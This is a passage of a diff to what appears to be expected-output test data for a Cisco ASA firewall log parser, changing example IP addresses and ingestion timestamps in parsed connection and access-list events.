-1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672424900Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:32:11.535017400Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" 
@@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672426609Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:32:11.535021700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 @@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.672428567Z", - "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:32:11.535026900Z", + "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, 
@@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672430273Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535031200Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672432095Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535035200Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, 
@@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672433901Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535039700Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672435687Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535045400Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, 
@@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672437410Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535049400Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672439163Z", - "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535053900Z", + "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, 
@@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672441057Z", - "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535058800Z", + "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672442981Z", - "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535063200Z", + "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672444700Z", + "ingested": "2021-12-09T13:32:11.535067400Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672686227Z", - "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535071Z", + "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.672694181Z", - "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:32:11.535075400Z", + "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" 
@@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.672696392Z", - "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:32:11.535081200Z", + "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672698183Z", - "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535087900Z", + "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, 
@@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672699982Z", - "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535093200Z", + "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672701734Z", - "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535099Z", + "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, 
@@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672703527Z", - "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535104800Z", + "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672705277Z", - "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535110600Z", + "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" 
@@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672707494Z", - "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:32:11.535116400Z", + "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672709522Z", - "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:32:11.535122100Z", + "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, 
@@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672711305Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535127900Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672717900Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535133600Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, 
@@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673302991Z", - "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535139200Z", + "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673308988Z", + "ingested": "2021-12-09T13:32:11.535144900Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2821,8 +2821,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2858,13 +2858,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673311212Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:32:11.535150500Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", 
@@ -2894,8 +2894,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2931,13 +2931,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673313288Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:32:11.535156800Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2972,8 +2972,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3007,13 +3007,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673315096Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:32:11.535162600Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3029,7 +3029,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 
@@ -3050,8 +3050,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3085,13 +3085,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673316830Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:32:11.535168700Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3107,7 +3107,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3128,8 +3128,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3160,7 +3160,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3168,8 +3168,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673318546Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:32:11.535173800Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3205,8 +3205,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3237,7 +3237,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3245,8 +3245,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673320261Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:32:11.535178600Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3282,8 +3282,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3314,7 +3314,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, 
@@ -3322,8 +3322,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673321982Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:32:11.535184800Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3359,8 +3359,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3385,14 +3385,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673324042Z", - "original": "Dec 11 